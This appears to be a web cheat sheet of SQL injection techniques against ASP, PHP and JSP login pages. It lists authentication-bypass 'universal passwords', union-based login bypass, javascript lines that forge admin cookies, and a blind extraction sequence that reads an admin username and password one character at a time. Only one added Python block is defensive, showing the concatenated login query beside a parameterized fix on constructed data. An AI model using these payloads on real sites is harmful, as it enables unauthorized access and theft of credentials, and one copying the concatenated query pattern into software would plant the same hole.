Alternative login injection form:
A common kind of login check (found in ASP, PHP and JSP alike) first tests whether the user exists; in ASP, for example: "select password from admin where user_name='"&request("user_name")&"'"; it then compares the MD5 of the submitted password with the stored one.
The guessing approach builds on this: submit user_name: xxx'and password>'a; if the first character of password is greater than a, continue with user_name: xxx'and password>'b.
Injection method for select * from admin where username='admin' and password='':
Universal username: xxx' union select * from users/*
Injection method for select * from admin where username=admin and password=pass:
Account: 777 Password: 999 union select * from admin;
Universal passwords:
Username: admin'or'1'='1 Password: 'or'2'='2
username: 'or 1=1 or''=' passwd: anything 'or'='or'
'or''='
'or 1=1"or"="
'or 1=1/* php"or"a"="a"or 1=1--"or"="
"or"="a'='a"or1=1--"or=or"
''or'='or'
') or ('a'='a'.).or.('.a.'='.a'or 1=1'or 1=1--'or 1=1/*'or"="a'='a'or' '1'='1'
'or''='
'or''=''or''=' !!!!!
'or'='1'
'or'='or'
'or.'a.'='a'or1=1--
1'or'1'='1a'or' 1=1--a'or'1=1--or'a'='a'or1=1--or1=1--
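As an added example (not code from the original page), the concatenated login query from the list above is shown next to a parameterized version, both run against a constructed in-memory SQLite table; the `'or''='` universal password already listed makes the first accept any username while the second treats it as plain data.

```python
import sqlite3


def make_db():
    # Constructed demo data, not a real system: one admin row in an in-memory table.
    db = sqlite3.connect(":memory:")
    db.execute("create table admin (username text, password text)")
    db.execute("insert into admin values ('admin', 'correct-horse')")
    return db


def build_vulnerable_sql(username, password):
    # The concatenation pattern listed above: user input pasted straight into the SQL text.
    return ("select * from admin where username='" + username
            + "' and password='" + password + "'")


def login_vulnerable(db, username, password):
    """Login check built by string concatenation: any returned row counts as success."""
    return db.execute(build_vulnerable_sql(username, password)).fetchone() is not None


def login_parameterized(db, username, password):
    """Same check with bound parameters: the driver sends the values separately from
    the statement, so quotes and keywords inside them are data, never SQL syntax.
    The 'user exists, then compare MD5' pattern from the top of the page is fixed the
    same way by binding user_name."""
    row = db.execute(
        "select * from admin where username=? and password=?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    payload = "'or''='"  # one of the universal passwords listed above
    # The concatenated text ends in password=''or''='' , i.e. "... or ''=''", always true.
    print(build_vulnerable_sql("admin", payload))
    print("vulnerable:", login_vulnerable(db, "admin", payload))        # True
    print("parameterized:", login_parameterized(db, "admin", payload))  # False
```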
Cookie injection:
Take http://xxxx/view.asp?id=23. First visit http://xxxx/view.asp?id=23, then type into the browser address bar:
javascript:alert(document.cookie="id="+escape("23 and 1=1"))
Then visit http://xxxx/view.asp (no error)
Then enter: javascript:alert(document.cookie="id="+escape("23 and 1=2"))
Then visit: http://xxxx/view.asp (error)
If the page errors here, Cookie injection is possible.
Cookie spoofing
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));
javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));
javascript:alert(document.cookie="admindj="+escape("1"));
Then change login.asp to admin_index.asp.
Search-type injection
For example:
Test for injection: 1%'and 1=1 and'%'='
1%'and 1=2 and'%'='
Check whether the table exists: 1%'and(select count(*)from admin)>0 and'%'='
Check whether the field exists: 1%'and(select top 1 len(username)from admin) and'%'='
1%'and(select top 1 len(password)from admin) and'%'='
Guess the range of the field contents: 1%'and(select top 1 asc(mid(username,1,1))from admin)>102 and'%'='
1%'and(select top 1 asc(mid(username,1,1))from admin)>40 and'%'='
1%'and(select top 1 asc(mid(username,1,1))from admin)=97 and'%'='
1%'and(select top 1 asc(mid(username,2,1))from admin)=100 and'%'='
1%'and(select top 1 asc(mid(username,3,1))from admin)=109 and'%'='
1%'and(select top 1 asc(mid(username,4,1))from admin)=105 and'%'='
1%'and(select top 1 asc(mid(username,5,1))from admin)=110 and'%'='
1%'and(select top 1 asc(mid(password,1,1))from admin)=49 and'%'='
1%'and(select top 1 asc(mid(password,2,1))from admin)=52 and'%'='
1%'and(select top 1 asc(mid(password,3,1))from admin)=50 and'%'='
1%'and(select top 1 asc(mid(password,4,1))from admin)=49 and'%'='
1%'and(select top 1 asc(mid(password,5,1))from admin)=53 and'%'='
1%'and(select top 1 asc(mid(password,6,1))from admin)=68 and'%'='
1%'and(select top 1 asc(mid(password,7,1))from admin)=51 and'%'='
1%'and(select top 1 asc(mid(password,8,1))from admin)=49 and'%'='
1%'and(select top 1 asc(mid(password,9,1))from admin)=50 and'%'='
1%'and(select top 1 asc(mid(password,10,1))from admin)=49 and'%'='
1%'and(select top 1 asc(mid(password,11,1))from admin)=57 and'%'='
1%'and(select top 1 asc(mid(password,12,1))from admin)=52 and'%'='
1%'and(select top 1 asc(mid(password,13,1))from admin)=43 and'%'='
1%'and(select top 1 asc(mid(password,14,1))from admin)=51 and'%'='
1%'and(select top 1 asc(mid(password,15,1))from admin)=68 and'%'='
1%'and(select top 1 asc(mid(password,16,1))from admin)=51 and'%'='